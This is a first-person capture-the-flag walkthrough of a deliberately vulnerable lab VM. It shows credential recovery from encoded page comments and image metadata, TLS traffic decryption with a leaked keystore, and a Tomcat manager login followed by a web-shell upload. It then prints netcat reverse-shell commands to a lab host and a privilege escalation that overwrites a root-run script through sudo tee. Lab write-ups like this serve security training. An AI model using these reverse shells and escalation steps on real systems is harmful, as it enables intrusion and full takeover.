This is the first VM of a series. It was really interesting and funny!
First of all I performed an nmap scan but I don’t write here the output because there are 65389 ports open; by the way that was really really strange. There is a port 80 open, so I checked if there was a website running on the VM, so I browsed to http://192.168.110.140 and the website appeared. Looking into the page source I discovered this:
<!------ Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->
Seems to be a base64 encoded string so I decoded it and that was the result:
Another base64 encoded string, I re-decoded it and finally I found something interesting:
An username and a password, maybe they will be useful later. Before go further I tried to scan the website with dirbuster to find some directories and I find the /images one which conatains several images. I downloaded all of them and I checked with exiftool if they had some interesting informations. I discovered that the image bill.png contains coffeestains as a comment. Ok, now I can click on the image at the center of the website page and I will be redirected into another page where I can access the Employeer Portal. Now I need to login and I tried the string recovered into the source page and it worked!
The next step is to analyze the portal. First of all I noticed that there are 3 unread messages into the user inbox so I read it. The first one was sent by the admin who says that all sensitive informations should be posted into the admin portal. The second and the third one talk about the purchase of IDS/IPS system and I found a link for the keystore: http://192.168.110.140/.keystore. I downloaded it because it is really important. Now I switched to “View Account” section and I discovered a comment by this user (Peter Gibbsons), the title of the content is: “SSL implementation test capture”. I found a link for a .pcap file: http://192.168.110.140/impresscms/_SSL_test_phase1.pcap, so I downloaded it. AN useful information into the comment is that:
They told me the alias, storepassword and keypassword are all set to 'tomcat'.
Do you remember the .keystore file? I can extract the private key from it and I can decrypt the traffic. So I use this command to extract the private key:
keytool -importkeystore -srckeystore keystore -destkeystore key.p12 -deststoretype PKCS12 -srcalias tomcat
Now you need to type the destination file password (I used tomcat again) and the source keystore password (which is tomcat) and you will get the private key file. Now open wireshark, go to Settings and under Protocols select SSL. Now click Edit… near RSA key list and press the + and fill the input fields: into IP type 192.168.110.140, into Port type 8443, into Protocol type http, into Key File you need to import the extracted private key and into the Password type tomcat. Press OK and import the .pcap file. If all is correct you should able to see the Client Hello string. Right click on it and follow the SSL stream. I discovered that an user tried to login into /_M@nag3Me/html and used tomcat:Tt\5D8F(#!*u=G)4m7zB as username and password. I decoded the string from Basic Authentication into the GET request. So just try to login: browse to https://192.168.110.140:8443/_M@nag3Me/html and use the username and password discovered before. Now I am logged into the tomcat server.
Now it’s time to get a shell. I can simply deploy a .war file (I used the laudanum one). Once I uploaded the cmd.war file I browsed to https://192.168.110.140:8443/_M@nag3Me/cmd/cmd.jsp. Now I started to listen locally:
sudo nc -lvp 1234 Then I executed the following command into the tomcat server:
nc 192.168.110.2 1234 -e /bin/bash
The I got a bind shell but I need TTY:
python -c 'import pty; pty.spawn("/bin/bash")'
Perfect, now I started to analyze the server. First of all I browsed to /home to see which usernames are available: blumbergh and milton. Do you remember the comment which I found into an image with exiftool? Maybe it can be a password of one of these users. So I tried to login as blumbergh and I used coffeestains as password and it worked! Now I need to escalated my privileges. First of all I checked what the user can run as root:
This is the output:
(root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh
Let’s check what tidyup.sh is:
This is the important part:
#This script is set to run every 3 minutes as an additional defense measure against hackers.
So I can create a temporary file with bind shell inside, cat it into the shell and use tee to write into the .sh script. So let’s create the file:
echo "nc 192.168.110.2 1235 -e /bin/bash" > /tmp/shell
And perform the trick:
cat /tmp/shell | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
Now listen locally:
sudo nc -lvp 1235
And wait for the shell. Once you got it browse to /root and list the files:
There is a .flag.txt file, just cat it:
VM rooted and completed!